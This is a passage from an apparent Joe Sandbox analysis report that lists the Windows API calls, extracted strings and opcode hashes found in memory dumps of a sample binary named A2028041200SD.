                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0092961A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 62396123e8a58b364bb5f2ed6519b54fa76d7902383ab2e6783e2b7e2dc50e66
                                                                        • Instruction ID: f7cee13bf630ef65863058532214b9c140c5e1f69e498711deac05bbe84cb186
                                                                        • Opcode Fuzzy Hash: 62396123e8a58b364bb5f2ed6519b54fa76d7902383ab2e6783e2b7e2dc50e66
                                                                        • Instruction Fuzzy Hash: 6A414171E14219AFCB01EFA4D848DDEBBB9FF48354F008065F905A3261DB31EA85DBA1
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CoInitialize.OLE32 ref: 0094ADF6
                                                                        • CoUninitialize.OLE32 ref: 0094AE01
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0097D8FC,?), ref: 0094AE61
                                                                        • IIDFromString.OLE32(?,?), ref: 0094AED4
                                                                        • VariantInit.OLEAUT32(?), ref: 0094AF6E
                                                                        • VariantClear.OLEAUT32(?), ref: 0094AFCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 834269672-1287834457
                                                                        • Opcode ID: ff4d07e6a666395505c978d88bc3b0a619a5479d241020f830b31a2137eb6c8d
                                                                        • Instruction ID: 9b08ad9f51d12a026ad5fa8d86d5c8d6881e8923d4a266597952583abe02a124
                                                                        • Opcode Fuzzy Hash: ff4d07e6a666395505c978d88bc3b0a619a5479d241020f830b31a2137eb6c8d
                                                                        • Instruction Fuzzy Hash: 68619771248311AFD710DF64C888F6BBBE8AF89714F104849F9959B2A1C774ED48CB93
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00948168
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 009481AD
                                                                        • gethostbyname.WSOCK32(?), ref: 009481B9
                                                                        • IcmpCreateFile.IPHLPAPI ref: 009481C7
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00948237
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0094824D
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009482C2
                                                                        • WSACleanup.WSOCK32 ref: 009482C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 7b16125d3787ab5fd930607562df312d6d4b594d740f6a73b999f16fd5beb80c
                                                                        • Instruction ID: fa26a0e431caf6b014b000cbfab28dc26a169c5cce993c324a3aaad96739a56b
                                                                        • Opcode Fuzzy Hash: 7b16125d3787ab5fd930607562df312d6d4b594d740f6a73b999f16fd5beb80c
                                                                        • Instruction Fuzzy Hash: D0517C31604600AFD710AF64CC45F2FB7E8EF48750F04892AFA6ADB2A0DB74E905DB42
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00959E5B
                                                                        • CreateMenu.USER32 ref: 00959E76
                                                                        • SetMenu.USER32(?,00000000), ref: 00959E85
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00959F12
                                                                        • IsMenu.USER32(?), ref: 00959F28
                                                                        • CreatePopupMenu.USER32 ref: 00959F32
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00959F63
                                                                        • DrawMenuBar.USER32 ref: 00959F71
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                        • String ID: 0
                                                                        • API String ID: 176399719-4108050209
                                                                        • Opcode ID: 41c07993da3c9fa376a0ec5740ba4ee57f4656ddccab4e220be513c6029e2930
                                                                        • Instruction ID: db6e6f79b2aeafa93938968d462dc12c7e2b7a1b48cf71962f7b08f86ae66294
                                                                        • Opcode Fuzzy Hash: 41c07993da3c9fa376a0ec5740ba4ee57f4656ddccab4e220be513c6029e2930
                                                                        • Instruction Fuzzy Hash: D04165B5A11209EFEB10CF65D944BAABBB9FF48315F144128FD4AA7360D330AD18DB50
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093E396
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0093E40C
                                                                        • GetLastError.KERNEL32 ref: 0093E416
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0093E483
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: a59d57a6d7019d5cde41b5d29e1af711d1c81a17785d396302121377f4dbad6c
                                                                        • Instruction ID: 57a7744449218976fa3f6e339b8d12932bcb076c8bd53965e3d5b4bd6ddf599f
                                                                        • Opcode Fuzzy Hash: a59d57a6d7019d5cde41b5d29e1af711d1c81a17785d396302121377f4dbad6c
                                                                        • Instruction Fuzzy Hash: 1F316135A00209AFDB01EB68C949ABEB7B8FF49714F148425F905EB2E1D770AA41CF91
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0092B98C
                                                                        • GetDlgCtrlID.USER32 ref: 0092B997
                                                                        • GetParent.USER32 ref: 0092B9B3
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0092B9B6
                                                                        • GetDlgCtrlID.USER32(?), ref: 0092B9BF
                                                                        • GetParent.USER32(?), ref: 0092B9DB
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0092B9DE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: d5b8661024af76f32fc1b76b21b632bb19835b6ca5b9fd0f76f86bc3453dc825
                                                                        • Instruction ID: de259bee570ac89a0929d46ba92666481a9e0a9572572e9b5b49cf471602e55f
                                                                        • Opcode Fuzzy Hash: d5b8661024af76f32fc1b76b21b632bb19835b6ca5b9fd0f76f86bc3453dc825
                                                                        • Instruction Fuzzy Hash: 2821F575900108BFDB04ABB4DC86EFEBBB8EF89314F10011AF655A32E5DB745955EB20
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0092BA73
                                                                        • GetDlgCtrlID.USER32 ref: 0092BA7E
                                                                        • GetParent.USER32 ref: 0092BA9A
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0092BA9D
                                                                        • GetDlgCtrlID.USER32(?), ref: 0092BAA6
                                                                        • GetParent.USER32(?), ref: 0092BAC2
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0092BAC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 6a5381e9f5fcd52d64fe9cab3e40d29b1e183aabb2a21fc884b1e0a711f99945
                                                                        • Instruction ID: c63e8f3207c9d8f6309b21ab56ff078553abca6613045d919e2b8720306fc906
                                                                        • Opcode Fuzzy Hash: 6a5381e9f5fcd52d64fe9cab3e40d29b1e183aabb2a21fc884b1e0a711f99945
                                                                        • Instruction Fuzzy Hash: 3921C2B5A00118BFDB00ABA4DC85EFEBBB9EF49300F100015F555A3195DBB9595AAB20
                                                                        APIs
                                                                        • GetParent.USER32 ref: 0092BAE3
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0092BAF8
                                                                        • _wcscmp.LIBCMT ref: 0092BB0A
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0092BB85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 7117d30824949e2b8b91b4d889e0852a41494b3108ff131f206600b6334e2caa
                                                                        • Instruction ID: d4dfd503aa47a277deba90deb26c29c9e5856fd18b7b46bfc6b839a2cb706729
                                                                        • Opcode Fuzzy Hash: 7117d30824949e2b8b91b4d889e0852a41494b3108ff131f206600b6334e2caa
                                                                        • Instruction Fuzzy Hash: F111067770C317F9FA206724FC0BEA637ECAF91724B200022F909E40D9EBA6A8915554
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0094B2D5
                                                                        • CoInitialize.OLE32(00000000), ref: 0094B302
                                                                        • CoUninitialize.OLE32 ref: 0094B30C
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0094B40C
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0094B539
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0094B56D
                                                                        • CoGetObject.OLE32(?,00000000,0097D91C,?), ref: 0094B590
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0094B5A3
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0094B623
                                                                        • VariantClear.OLEAUT32(0097D91C), ref: 0094B633
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: f0eeca59c16f3262e8aec09f034b99f21c2ba3a977aba4e4c9bd95885b69e501
                                                                        • Instruction ID: b2279322efebecd329dd3bf06640a494ad5799c501f90cf2d8138fa3367b6b21
                                                                        • Opcode Fuzzy Hash: f0eeca59c16f3262e8aec09f034b99f21c2ba3a977aba4e4c9bd95885b69e501
                                                                        • Instruction Fuzzy Hash: C6C1E0B1608305AFC700DF69C884A6AB7E9BF89308F04495DF58ADB261DB71ED45CB52
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 009367FD
                                                                        • __swprintf.LIBCMT ref: 0093680A
                                                                          • Part of subcall function 0091172B: __woutput_l.LIBCMT ref: 00911784
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00936834
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00936840
                                                                        • LockResource.KERNEL32(00000000), ref: 0093684D
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 0093686D
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0093687F
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0093688E
                                                                        • LockResource.KERNEL32(?), ref: 0093689A
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009368F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: 7633ad735dfe28c75349fae40e499e7873c146f8681b74745b938f885ca50e60
                                                                        • Instruction ID: 75dafd914043c95a3a6e533697610c3ada3182c13a7dab71e26954081dbc11b8
                                                                        • Opcode Fuzzy Hash: 7633ad735dfe28c75349fae40e499e7873c146f8681b74745b938f885ca50e60
                                                                        • Instruction Fuzzy Hash: 7F319E72A0521ABBDB109F60DD59ABF7BBCFF08340F008425F916E2151E734D952EBA0
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00934047
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009330A5,?,00000001), ref: 0093405B
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00934062
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 00934071
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00934083
                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 0093409C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009330A5,?,00000001), ref: 009340AE
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 009340F3
                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 00934108
                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009330A5,?,00000001), ref: 00934113
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 95ade67b9b9aeccca60191fc89a3592efa438c0bbeb50907ec65708422737b76
                                                                        • Instruction ID: 8fce522e2af56a80ae1502f969fbd0b3f7bf7868aa290b63702ae79601b33171
                                                                        • Opcode Fuzzy Hash: 95ade67b9b9aeccca60191fc89a3592efa438c0bbeb50907ec65708422737b76
                                                                        • Instruction Fuzzy Hash: 2031BF72628614ABDB10DB94DC85B797BBDAF60321F12C115FD08E6290CBB4EA809F60
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 0090B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0090B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0090B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 0090B4BD
                                                                        • GetClientRect.USER32(?), ref: 0096DD63
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0096DD7A
                                                                        • GetWindowDC.USER32(?), ref: 0096DD86
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0096DD95
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096DDA7
                                                                        • GetSysColor.USER32(00000005), ref: 0096DDC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: a36976fc2ecfff008735052a66da2126888373c444470e022d976008158e7f36
                                                                        • Instruction ID: 0c45c5dd7689279ded361fe72462c68e6b74c4e626ba2f0cf024424fe2fae3f5
                                                                        • Opcode Fuzzy Hash: a36976fc2ecfff008735052a66da2126888373c444470e022d976008158e7f36
                                                                        • Instruction Fuzzy Hash: D9115132515205EFDB116F74EC08BA97B75EF05325F504625FA6AA50F1CB320981EF10
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,0092CF50), ref: 0092CE90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: bf08f670264e33dac7905826fd8dc0d9ccdbff7b012f8d83a9aa9d7aace0a866
                                                                        • Instruction ID: 6eea896631825cc974ff59f126b4e4c626566325d8037963b82f9286cd8d7cca
                                                                        • Opcode Fuzzy Hash: bf08f670264e33dac7905826fd8dc0d9ccdbff7b012f8d83a9aa9d7aace0a866
                                                                        • Instruction Fuzzy Hash: 6091B17060021AABCB18EF64D481BEEFBB9FF45340F518919E949A7185DF306D99CBE0
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008F30DC
                                                                        • CoUninitialize.OLE32(?,00000000), ref: 008F3181
                                                                        • UnregisterHotKey.USER32(?), ref: 008F32A9
                                                                        • DestroyWindow.USER32(?), ref: 00965079
                                                                        • FreeLibrary.KERNEL32(?), ref: 009650F8
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00965125
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 6211b5bfeb4a0213c065f58410150f89cb23a2df69f43bd0a13915a1a578072f
                                                                        • Instruction ID: 1fc57f94b321b6b359f43211dcdb24c48e0311497c42878da7ef500aff779967
                                                                        • Opcode Fuzzy Hash: 6211b5bfeb4a0213c065f58410150f89cb23a2df69f43bd0a13915a1a578072f
                                                                        • Instruction Fuzzy Hash: A791283460120A9FC715EF28C895B78F3A8FF15304F5582A9E60AA7262DF30AE56CF55
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0090CC15
                                                                          • Part of subcall function 0090CCCD: GetClientRect.USER32(?,?), ref: 0090CCF6
                                                                          • Part of subcall function 0090CCCD: GetWindowRect.USER32(?,?), ref: 0090CD37
                                                                          • Part of subcall function 0090CCCD: ScreenToClient.USER32(?,?), ref: 0090CD5F
                                                                        • GetDC.USER32 ref: 0096D137
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0096D14A
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0096D158
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0096D16D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096D175
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0096D200
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
